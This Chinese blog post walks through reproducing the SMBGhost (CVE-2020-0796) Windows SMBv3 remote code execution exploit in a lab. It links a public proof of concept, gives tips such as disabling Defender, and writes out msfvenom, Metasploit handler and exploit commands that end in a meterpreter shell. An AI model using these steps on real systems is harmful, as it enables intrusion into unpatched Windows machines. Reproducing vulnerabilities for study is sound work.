这期内容当中小编将会给大家带来有关怎么解析CVE-2020-0796 RCE漏洞,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
漏洞介绍
微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796
影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
复现坑点:坑点比较多看一下
EXP地址:
https://github.com/chompie1337/SMBGhost_RCE_PoC
-
Win10 版本有限制,具体我自己用的下面这个成功的
下载地址
-
python 版本
python 3.6 可以成功!
python 3.6 可以成功!
python 3.7 和 2 实测蓝屏
不懂为啥,有大佬知道可以指导一下弟弟
-
payload要正向监听
-
补丁也有坑,KB4551762讲道理是没有,但是win10的补丁,看见就那几个,但是那个补丁里面可能有包含这个补丁
-
需要关闭defender防火墙
复现过程
首先使用systeminfo看一下补丁(KB4551762)
我新装的,肯定没啥问题,
-
msf生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '/x00' -i 1 -f python
EXP替换shellcode
把buf 替换成USER_PAYLOAD
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 6666 set rhost 192.168.31.235 run
运行EXP
python3 exploit.py -ip 192.168.100.54
最终拿到shell
上述就是小编为大家分享的怎么解析CVE-2020-0796 RCE漏洞了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。
原创文章,作者:3628473679,如若转载,请注明出处:https://blog.ytso.com/220539.html